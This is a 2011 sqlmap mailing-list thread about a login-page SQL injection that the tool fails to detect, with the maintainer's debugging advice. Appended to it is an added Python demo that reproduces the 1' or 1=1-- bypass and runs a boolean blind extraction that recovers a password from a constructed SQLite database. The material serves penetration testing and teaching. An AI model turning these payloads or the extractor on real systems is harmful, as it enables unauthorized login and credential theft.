hi Matt

On Sat, Jun 4, 2011 at 10:47 PM, Matt Gardenghi <mtgar...@gmail.com> wrote:
> Hello,
>
> I've been testing a non-production app from a black-box perspective. The
> only SQLi I've found is from the login page. I can bypass the login by
> dropping something like: 1' or 1=1-- into the password field.
> Unfortunately, sqlmap doesn't find this vulnerability. Well, that's not
> quite true. I eventually dumped my Burp proxy log into a file and had
> sqlmap target it. The POST file is icky (IIS7.5 ASP and tons of weird data
> running around). Still, after repeated tests, sqlmap eventually found this
> vulnerability as a time-based SQLi.
>
> I don't understand why sqlmap cannot locate the vulnerability via the
> stacked query or simply that it bypasses the login page. When I get in, I
> can't extract data. I can get verification that I'm a DBA, but little to
> nothing else. With --sql-shell, I can run 'SELECT @@version' and sqlmap
> returns a blank data set; if the query is bogus, it returns an error. So,
> for some reason, no data is returned.
>
> Would anyone be able to give me some pointers on a) why sqlmap doesn't see
> this injection properly, and b) why I would get no data returned?
no problem.

in this kind of situation the rule of thumb goes like this:

1) try to exploit it manually
2) if you succeed in 1) then please report back and we'll be more than happy to make a fix
3) if you don't succeed with 1) then please collect as much data as you can with -v 3 and -t traffic.txt, inspect it yourself and try to find something that could explain sqlmap's faulty behavior
4) if you are not very skillful with 2) or 3) you can always send some more data (traffic.txt, debug output of -v 3, target url) privately via email

kr

p.s. personally, i admire people that do 1) and 2) by themselves and report back.

> Thanks,
>
> --
> Matt Gardenghi

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
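Step 1 of the reply above, exploiting the login injection by hand before blaming the tool, as an added example that is not part of either message and is not sqlmap's own code. It uses a constructed in-memory SQLite stand-in for the login page (the users table, the `admin`/`S3cr3t!` credentials and the concatenated query are all assumptions), reproduces the `1' or 1=1--` bypass from the original question, and then turns the same login success/failure signal into a boolean oracle that recovers a value the page never displays. The thread's real target is MSSQL; the SQLite function names used here (`length`, `substr`, `unicode`) correspond to `LEN`, `SUBSTRING` and `ASCII` there.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the application's database: one users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!', 'dba')")  # assumed sample row
    return conn


def vulnerable_login(conn, username, password):
    """Login check that concatenates both fields into the query, the way the
    login page in the thread evidently does.  Returns True when any row comes
    back ("logged in"), False when no row matches or the SQL fails (a syntax
    error is assumed to be rendered as a generic failure page)."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def extract_string(oracle, subquery, max_len=64):
    """Recover the scalar result of `subquery` through a boolean oracle
    (oracle(password_payload) -> logged in?).  Each position is first tested
    for existence, then its code point is binary-searched over 0..127, so a
    character costs about eight requests instead of one per candidate.
    Printable ASCII is assumed for the constructed sample data."""
    result = ""
    for pos in range(1, max_len + 1):
        # Is there an n-th character at all?  If not, the string is complete.
        if not oracle("1' or length((%s)) >= %d--" % (subquery, pos)):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("1' or unicode(substr((%s), %d, 1)) > %d--" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo():
    """Runs the bypass and the blind extraction against the constructed database."""
    conn = build_db()
    bypass = vulnerable_login(conn, "nobody", "1' or 1=1--")
    oracle = lambda payload: vulnerable_login(conn, "nobody", payload)
    secret = extract_string(oracle, "select password from users where username = 'admin'")
    return bypass, secret


if __name__ == "__main__":
    bypass, secret = demo()
    print("login bypass with 1' or 1=1-- :", bypass)
    print("admin password recovered via boolean oracle:", secret)
```

If the manual oracle works while sqlmap reports nothing, the traffic.txt from `-t` is where to look: compare the request sqlmap actually sent with the hand-built one, since extra POST fields, a viewstate or a changed content-type on an ASP page are the usual reasons the tool's payload never reaches the vulnerable query.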